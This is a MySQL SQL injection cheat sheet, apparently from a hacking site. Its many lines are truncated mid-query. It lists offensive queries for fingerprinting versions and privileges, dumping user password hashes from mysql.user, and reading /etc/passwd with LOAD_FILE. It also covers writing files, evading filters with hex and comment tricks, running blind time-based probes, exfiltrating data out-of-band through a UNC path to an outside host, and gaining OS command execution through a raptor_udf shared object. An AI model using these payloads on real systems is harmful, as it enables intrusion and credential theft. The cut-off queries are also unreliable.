[INFO]=> QUERYS SQL ~ INJECTION

1. Version:
2. SELECT VERSION()
3. SELECT @@version
4. SELECT @@version_comment
5. SELECT @@version_compile_machine
6. SELECT @@version_compile_os
7. Directories:
8.  SELECT @@basedir
9.  SELECT @@tmpdir
10.  SELECT @@datadir
11. Users:
12.  SELECT USER()
13.  SELECT SYSTEM_USER()
14.  SELECT SESSION_USER()
15.  SELECT CURRENT_USER()
16. Current Database:
17.  SELECT DATABASE()
18. Concatenation:
19.  SELECT CONCAT('foo','.','bar'); #Returns: foo.bar
20.  SELECT CONCAT_WS(' ','Hello','MySQL','and','hello','world!'); #Retu
21. Multi-Concat:
22. #Stacks the row "foo" from the table "bar" together, using the separa
23.  #Note: This operation can by default only grab 1024 bytes, and do no
24.  #The 1024 byte limit is stored in the @@group_concat_max_len variabl
25. SELECT GROUP_CONCAT(foo SEPARATOR '<br />') FROM bar
26. Better-Concat:
27. #CONCAT() and CONCAT_WS() do not have the same restriction(s) as GROU
28.  #Which therefor allows you to concat strings together up to the @@ma
29.  #instead of @@group_concat_max_len. The default value for @@max_allo
30.  #1048576 bytes, instead of @@group_concat_max_len's 1024.
31. SELECT (CONCAT_WS(0x3A,(SELECT CONCAT_WS(0x2E,table_schema,table_name
32. Change Collation:
33. SELECT CONVERT('test' USING latin1); #Converts "test" to latin1 from
34.  SELECT CONVERT('rawr' USING utf8); #Converts "rawr" to utf8.
35. Wildcards in SELECT(s):
36.  SELECT foo FROM bar WHERE id LIKE 'test%'; #Returns all COLUMN(s) st
37.  SELECT foo FROM bar WHERE id LIKE '%test'; #Returns all COLUMN(s) en
38. Regular Expression in SELECT(s):
39. #Returns all columns matching the regular expression.
40. SELECT foo FROM bar WHERE id RLIKE '(moo|rawr).*'
41. SELECT Without Dublicates:
42. SELECT DISTINCT foo FROM bar
43. Counting Columns:
44.  SELECT COUNT(foo) FROM bar; #Returns the amount of rows "foo" from t
45. Get Amount of MySQL Users:
46.  SELECT COUNT(user) FROM mysql.user
47. Get MySQL Users:
48.  SELECT user FROM mysql.user
49. Get MySQL User Privileges:
50.  SELECT grantee,privilege_type,is_grantable FROM information_schema.us
51. Get MySQL User Privileges on Different Databases:
52.  SELECT grantee,table_schema,privilege_type FROM information_schema.sc
53.  Get MySQL User Privileges on Different Columns:
54.  SELECT table_schema,table_name,column_name,privilege_type FROM infor
55. Get MySQL User Credentials & Privileges:
56.  SELECT CONCAT_WS(0x2E,host,user,password,Select_priv,Insert_priv,Upd
57.  Create_priv,Drop_priv,Reload_priv,Shutdown_priv,Process_priv,
58.  File_priv,Grant_priv,References_priv,Index_priv,Alter_priv,Show_db_p
59.  Super_priv,Create_tmp_table_priv,Lock_tables_priv,Execute_priv,Repl_
60.  Repl_client_priv) FROM mysql.user
61. Get MySQL DBA Accounts:
62.  SELECT grantee,privilege_type,is_grantable FROM information_schema.us
63.  SELECT host,user FROM mysql.user WHERE Super_priv='Y'
64. Get Databases:
65.  SELECT schema_name FROM information_schema.schemata
66.  SELECT DISTINCT db FROM mysql.db
67.  SELECT DISTINCT table_schema FROM information_schema.columns
68.  SELECT DISTINCT table_schema FROM information_schema.tables
69. Get Databases & Tables:
70.  SELECT table_schema,table_name FROM information_schema.tables
71.  SELECT DISTINCT table_schema,table_name FROM information_schema.colu
72. Get Databases, Tables & Columns:
73.  SELECT table_schema,table_name,column_name FROM information_schema.c
74. SELECT A Certain Row:
75. SELECT foo FROM bar LIMIT 0,1; #Returns row 0.
76.  SELECT foo FROM bar LIMIT 1,1; #Returns row 1.
77.  ...
78.  SELECT foo FROM bar LIMIT N,1; #Returns row N.
79. Benchmark (Heavy Query):
80. #Performs an MD5 calculation of "1" for 10000 times.
81. SELECT BENCHMARK(10000,MD5(1))
82. Sleep:
83. #Works only in MySQL 5 and above.
84.  #Sleeps for 5 seconds, returns 0 on success.
85. SELECT SLEEP(5)
86. Conversion (Casting):
87. SELECT CAST('1' AS UNSIGNED INTEGER); #Returns: 1
88.  SELECT CAST('65' AS CHAR); #Returns: A
89. Substring:
90. SELECT SUBSTR('foobar',1,3); #Returns: foo
91. Hexadecimal Evasion:
92. SELECT 0x41424344; #Returns: ABCD
93.  SELECT 0x2E; #Returns: .
94.  SELECT 0x3A; #Returns: :
95. ASCII to Number:
96. SELECT ASCII('A'); #Returns: 65
97.  Number to ASCII:
98. SELECT CHAR(65); #Returns: A
99.  SELECT CHAR(89); #Returns: Y
100.  SELECT CHAR(116,101,115,116); #Returns: test
101. If Statement:
102. #Returns 1 if the database is running MySQL 5.
103. SELECT IF(ASCII(SUBSTR(VERSION(),1,1))=53,1,0);
104. #Returns 1 if the database is running MySQL 4.
105. SELECT IF(ASCII(SUBSTR(VERSION(),1,1))=52,1,0);
106. Case Statement:
107. #Returns 1 if the database is running MySQL 5.
108. SELECT CASE WHEN (ASCII(SUBSTR(VERSION(),1,1))=53) THEN 1 ELSE 0 END
109. #Returns 1 if the database is running MySQL 4.
110. SELECT CASE WHEN (ASCII(SUBSTR(VERSION(),1,1))=52) THEN 1 ELSE 0 END
111. Read File(s):
112. #Requires you to have the File_priv in mysql.user. On error this stat
113. SELECT LOAD_FILE('/etc/passwd')
114. Write File(s):
115. #You must use quotes on the filename!
116. SELECT 'Hello World' INTO DUMPFILE '/tmp/test.txt'
117.  SELECT IF((SELECT NULL INTO DUMPFILE '/tmp/test.txt')=NULL,NULL,'Hel
118. Logical Operator(s):
119. AND, &&; #The AND operator have && as an alternative syntax.
120. OR, ||;  #The OR operator have || as an alternative syntax.
121. NOT, !; #The NOT operator have ! as an alternative syntax.
122. XOR; #The XOR operator got no alternative syntax.
123. Fuzzy Code Comment:
124. #Code within /*! are getting executed by MySQL. Additional /*! can be
125. SELECT/*!CONCAT_WS(0x3A,user,host,password)/*!FROM/*!mysql.user*/
126. Comments:
127. SELECT foo, bar FROM foo.bar-- Single line comment
128. SELECT foo, bar FROM foo.bar/* Multi line comment */
129. SELECT foo, bar FROM foo.bar# Single line comment
130. SELECT foo, bar FROM foo.bar;%00 Batched query with additional NULL-
131. A few evasions/methods to use between your MySQL statements:
132. CR (%0D); #Carrier Return.
133. LF (%0A); #Line Feed.
134. Tab (%09); #The Tab-key.
135. Space (%20); #Most commonly used. You know what a space is.
136. Multiline Comment (/**/); #Well, as the name says.
137. Fuzzy Comment (/*!); #Be sure to end your query with (*/)
138. Parenthesis, ( and ); #Can also be used as separators when used right
139. Parenthesis instead of space:
140. #As said two lines above, the use of parenthesis can be used as a sep
141. SELECT * FROM foo.bar WHERE id=(-1)UNION(SELECT(1),(2))
142. Auto-Casting to Right Collation:
143. SELECT UNHEX(HEX(USER())); #UNHEX() Converts the hexadecimal value(s)
144. DNS Requests (OOB (Out-Of-Band)):
145. #For more information check this.
146. SELECT YourQuery INTO OUTFILE ‘\\\\www.your.host.com\\?file_to_save_a
147. Command Execution:
148. #If you're on a MySQL 4.X server, it's possible to execute OS comman
149. #It can be done if you're able to upload a shared object into /usr/
150.  #The file extension is .so, and it must contain an "User Defined Fun
151.  #Get raptor_udf.c, it's the source-code for just that feature.
152.  #Remember to compile it for the right CPU Architecture.
153.  #The CPU architecture can be resolved by this query:
154. SELECT @@version_machine;
155.  <blockquote>A couple of useful blind queries to fingerprint the data
156. All of these return either True or False, as in, you either get a res
157. SELECT * FROM foo.bar WHERE id=1 AND ASCII(SUBSTR(VERSION(),1,1))=53;
158.  SELECT * FROM foo.bar WHERE id=1 AND ASCII(SUBSTR(VERSION(),1,1))=52
159. Running as root:
160. SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT SUBSTR(USER(),1,4))=U
161. Got File_priv:
162. SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT File_priv FROM mysql.user
163.  (CONCAT_WS(CHAR(64),User,Host) LIKE USER()) OR
164.  (CONCAT(User,UNHEX(HEX(0x4025))) LIKE USER()) OR
165.  (CONCAT_WS(CHAR(64),User,Host) LIKE CONCAT(SUBSTR(USER(),1,INSTR(US
166.  LIMIT 0,1)=CHAR(89),1,0)=1
167. Got Super_priv (Are we DBA):
168. SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT Super_priv FROM mysql
169.  (CONCAT_WS(CHAR(64),User,Host) LIKE USER()) OR
170.  (CONCAT(User,UNHEX(HEX(0x4025))) LIKE USER()) OR
171.  (CONCAT_WS(CHAR(64),User,Host) LIKE CONCAT(SUBSTR(USER(),1,INSTR(US
172.  LIMIT 0,1)=CHAR(89),1,0)=1
173. Can MySQL Sleep:
174. #This query will return True and should take above 1 second to execut
175. SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT SLEEP(1))=0,1,0)=1
176. Can MySQL Benchmark:
177. SELECT * FROM foo.bar WHERE id=1 AND IF(BENCHMARK(1,MD5(0))=0,1,0)=1
178. Are we on *NIX:
179. SELECT * FROM foo.bar WHERE id=1 AND ASCII(SUBSTR(@@datadir,1,1))=47
180. Are we on Windows:
181. SELECT * FROM foo.bar WHERE id=1 AND IF(ASCII(SUBSTR(@@datadir,2,1))=
182. Do a certain column exist:
183. SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(column_name) FROM information
184.  Do a certain table exist:
185. SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_name) FROM
186. SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_name) FROM
187. Do a certain database exist:
188. SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_schema) FROM
189. SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_schema) FROM
190. SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(schema_name) FROM information
191. SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(db) FROM mysql.db
192. from:h.ackack(dot)net